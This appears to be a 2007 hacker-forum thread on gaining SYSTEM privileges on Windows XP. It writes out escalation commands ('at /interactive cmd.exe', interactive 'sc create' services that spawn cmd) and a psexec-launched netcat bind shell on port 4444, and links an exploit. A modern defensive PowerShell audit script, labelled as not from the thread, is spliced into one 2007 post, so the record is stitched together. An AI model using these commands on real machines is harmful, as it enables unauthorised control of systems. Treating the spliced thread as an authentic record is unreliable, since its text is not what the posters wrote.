Windows System User


17 replies to this topic

#1 wethcr

wethcr

    DDP Fan club member

  • Members
  • 51 posts

Posted 13 April 2007 - 05:38 PM

When was it found out that you could log onto the Windows XP System account from a limited account? Yes, you have full control of the computer, and of the domain if you're on one.
Just wondering, because it's a nice little thing to know, and I'm just curious as to how long after XP was released it was found.

Is this even a well known issue of XP?

Edited by wethcr, 13 April 2007 - 05:41 PM.


#2 thej3w

thej3w

    T0tal n00b

  • Members
  • 0 posts
  • Location:Chicago

Posted 13 April 2007 - 07:19 PM

Depends on what you are talking about logging into the SYSTEM account. If you're talking about, I know the one I use works in 2000, XP, 2003, and Vista.

#3 xantr3x

xantr3x

    SUP3R 31337 P1MP

  • Members
  • 280 posts

Posted 13 April 2007 - 08:55 PM

Use the command:

at (insert time + 1 minute here) /interactive cmd.exe

A new Command Prompt will open; next, open up the Task Manager. End explorer.exe and start it again in the new Command Prompt by typing explorer.exe. The desktop will refresh, and voilà, you are superuser. Just log off and log on again to go back. In superuser you can control everything.

#4 intimidat0r

intimidat0r

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 455 posts

Posted 13 April 2007 - 11:56 PM

Except limited users cannot run 'at'.

#5 xantr3x

xantr3x

    SUP3R 31337 P1MP

  • Members
  • 280 posts

Posted 14 April 2007 - 12:07 AM

Yeah, general users can, limited/restricted can't.

#6 operat0r

operat0r

    Dangerous free thinker

  • Members
  • 793 posts
  • Location:ops

Posted 14 April 2007 - 12:27 AM

sc delete killall
sc create killall binpath= "cmd /K start c:\cax /killuser \"%username%\"" type= own type= interact
sc start killall


sc runs as SYSTEM.

#7 Alk3

Alk3

    "I Hack, therefore, I am"

  • Binrev Financier
  • 1,003 posts
  • Gender:Not Telling
  • Location:312 Chi-town

Posted 14 April 2007 - 12:33 AM

We were messing with this today on our school network (with permission). We get our own hard drives for our labs and we can put/do whatever we want to these HDs. The 'at' command can be run by users with more than a regular user account. The Guest account can't do this on Vista or WinXP, but in earlier versions of Windoze you can do A LOT more than you think with the Guest account. So for those with Windows ME/2000/2003, try it out in the Guest account; it works in most cases. But operat0r posted the best option. :)

#8 wethcr

wethcr

    DDP Fan club member

  • Members
  • 51 posts

Posted 14 April 2007 - 12:02 PM

Thanks for the info, everyone. Could someone elaborate on operat0r's post with the SC command, please? It seems like something that would be good to know.

Thanks
Wethcr

#9 Alk3

Alk3

    "I Hack, therefore, I am"

  • Binrev Financier
  • 1,003 posts
  • Gender:Not Telling
  • Location:312 Chi-town

Posted 14 April 2007 - 05:41 PM

http://support.microsoft.com/kb/251192

#10 Dirk Chestnut

Dirk Chestnut

    SUP3R 31337 P1MP

  • Members
  • 268 posts
  • Location:248

Posted 14 April 2007 - 11:08 PM

This is a cool trick and all... but how do you run AT with any account that isn't a member of the local Administrators group?

From http://www.microsoft...s.mspx?mfr=true :

Using at

To use at, you must be a member of the local Administrators group.


Every so many months, these boards get random postings consisting of "You can escalate Windows privileges using AT," and some posters even claim this can be done with a regular user.

I assure you this is NOT the case in a normally configured system. While you can escalate administrator-level privileges to the SYSTEM account, you can't do this with a regular user. Just because you're not logged in as "Administrator" doesn't mean you're not an administrator of the system. I think a lot of you are getting confused, and thinking that just because your user account isn't named "Administrator," it must not be an administrator, and thus that this trick can be performed with a generic user account.

Try AT out sometime with an account you are positive is only a member of the regular "Users" group. You will be pleasantly disappointed.

Edited by Dirk Chestnut, 14 April 2007 - 11:36 PM.


#11 wethcr

wethcr

    DDP Fan club member

  • Members
  • 51 posts

Posted 15 April 2007 - 12:06 AM

You don't have to be in the admin group to run at.... We do this at school all the time with our plain old student account. And I know that isn't admin because we can't even install anything.

#12 Alk3

Alk3

    "I Hack, therefore, I am"

  • Binrev Financier
  • 1,003 posts
  • Gender:Not Telling
  • Location:312 Chi-town

Posted 15 April 2007 - 07:19 PM

It may just be a poorly configured account > a regular user account in the Users group. The account could also be an account created for students, and not set to a default user. The person who set it up may just have forgotten about 'at'.

#13 Anon-De-Anonymous

Anon-De-Anonymous

    DDP Fan club member

  • Members
  • 56 posts
  • Location:India

Posted 16 April 2007 - 11:47 AM

psexec can do wonders too!!

Suppose you run nc.exe located at c:\windows\system32
psexec -d -s c:\windows\system32\nc.exe -L -p 4444 -d -e cmd.exe
This will run netcat under the SYSTEM account, and psexec will exit after the execution!!

Better to use the old version of psexec that came with BackTrack 1; the newer one shows a license agreement (it cannot be run on remote machines as it pulls up a GUI!!).

Edited by Anon-De-Anonymous, 16 April 2007 - 11:49 AM.


#14 Hartley

Hartley

    H4x0r

  • Members
  • 33 posts

Posted 17 April 2007 - 02:04 AM

sc create hak binpath= "cmd /K start" type= own type= interact

works well good. :ranaway:
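As an added example (not posted by anyone in this thread), here is a defender-side PowerShell audit for the two points argued above: Dirk Chestnut's check that an account really is in the local Administrators group, and the interactive-service configuration that the "sc create ... type= own type= interact" commands leave behind. It assumes a current Windows host with Windows PowerShell 5.1 or later; the Event IDs 7045 (service installed, System log) and 4698 (scheduled task created, Security log) are standard Windows events.

```powershell
# Added example, not from this thread: audit a host for the primitives the posts
# rely on. Assumes Windows PowerShell 5.1+ and read access to the System log.

# 1. Is the current account really a member of the local Administrators group?
#    'at' and 'sc create' need this; the account name alone tells you nothing.
#    Under UAC an unelevated admin token also reports False here.
$identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
$adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator
Write-Output ("User {0}: local admin = {1}" -f $identity.Name, $principal.IsInRole($adminRole))

# 2. Services configured like "type= own type= interact": the Type DWORD under
#    HKLM\SYSTEM\CurrentControlSet\Services\<name> has SERVICE_INTERACTIVE_PROCESS
#    (0x100) set; 0x110 = own process + interactive. Flag any whose ImagePath
#    launches a shell or netcat instead of a real service binary.
$shellPattern = '(?i)\b(cmd|powershell|nc|netcat)(\.exe)?\b'
$findings = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if ($null -ne $props.Type -and ($props.Type -band 0x100)) {
            [pscustomobject]@{
                Service   = $_.PSChildName
                Type      = '0x{0:X}' -f $props.Type
                ImagePath = $props.ImagePath
                ShellLike = [bool]($props.ImagePath -match $shellPattern)
            }
        }
    }
$findings | Sort-Object -Property ShellLike -Descending | Format-Table -AutoSize

# 3. Recent service installations (Event ID 7045, Service Control Manager) and
#    scheduled-task creation (Event ID 4698, Security log, needs object-access
#    auditing enabled). 'sc create' and 'at' each leave one of these behind.
$filters = @(
    @{ LogName = 'System';   Id = 7045 },
    @{ LogName = 'Security'; Id = 4698 }
)
foreach ($filter in $filters) {
    Get-WinEvent -FilterHashtable $filter -MaxEvents 10 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{ Name = 'Summary'; Expression = { ($_.Message -split "`r?`n")[0] } } |
        Format-Table -AutoSize
}
```

Reading the Security log requires an elevated session; the other two checks work from a standard user, which is also how you confirm for yourself whether a "student" account is really just a member of Users.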

#15 Anon-De-Anonymous

Anon-De-Anonymous

    DDP Fan club member

  • Members
  • 56 posts
  • Location:India

Posted 17 April 2007 - 12:27 PM

sc create hak binpath= "cmd /K start" type= own type= interact

works well good. :ranaway:


That works with Admin privileges only and not as a User.

#16 Hartley

Hartley

    H4x0r

  • Members
  • 33 posts

Posted 18 April 2007 - 08:26 AM

could use this way http://www.hak5.org/...strator_Control

#17 Anon-De-Anonymous

Anon-De-Anonymous

    DDP Fan club member

  • Members
  • 56 posts
  • Location:India

Posted 18 April 2007 - 12:16 PM

could use this way http://www.hak5.org/...strator_Control


Yeah, that must work!! Thx

#18 Hartley

Hartley

    H4x0r

  • Members
  • 33 posts

Posted 18 April 2007 - 03:11 PM

The best way would be to use a real exploit like this one: http://www.milw0rm.com/exploits/3755. I have never taken any time to understand them, though, so I have never used one.
